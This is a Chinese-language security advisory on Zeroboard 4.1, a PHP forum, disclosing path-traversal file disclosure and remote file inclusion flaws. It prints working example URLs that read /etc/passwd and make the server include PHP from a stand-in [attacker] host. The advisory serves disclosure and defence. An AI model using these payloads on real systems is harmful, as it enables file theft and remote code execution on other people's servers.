安全研究

安全漏洞
Zeroboard远程文件泄露及任意命令执行漏洞

发布日期:2005-01-13
更新日期:2005-02-04

受影响系统:
Zeroboard Zeroboard 4.1 pl5
Zeroboard Zeroboard 4.1 pl2
描述:
BUGTRAQ  ID: 12258

Zeroboard是一款基于PHP的论坛程序。

Zeroboard不正确过滤用户提交的URL请求,远程攻击者可以利用这个漏洞查看系统文件内容或以进程权限执行任意命令。

远程用户可以提供包含多个'../'字符的数据作为参数提交给有漏洞的脚本处理,可以WEB进程权限查看任意文件内容:

http://[target]/_head.php?_zb_path=../../../../../etc/passwd%00
http://[target]/include/write.php?dir=../../../../../etc/passwd%00
http://[target]/outlogin.php?_zb_path=../../../../../etc/passwd%00

'print_category.php'脚本没有正确过滤用户提供的'dir'参数,指定远程服务器上的任意PHP文件作为包含文件,可以WEB进程权限执行PHP命令:

http://[target]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/

另外几个zero_vote相关脚本也存在此问题,如:

http://[target]/skin/zero_vote/login.php?dir=http://[attacker]/
http://[target]/skin/zero_vote/setup.php?dir=http://[attacker]/
http://[target]/skin/zero_vote/ask_password.php?dir=http://[attacker]/

<*来源:SSR Team (advisory@stgsecurity.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110565373407474&w=2
*>

建议:
厂商补丁:

Zeroboard
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.zeroboard.com/

浏览次数:2818
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障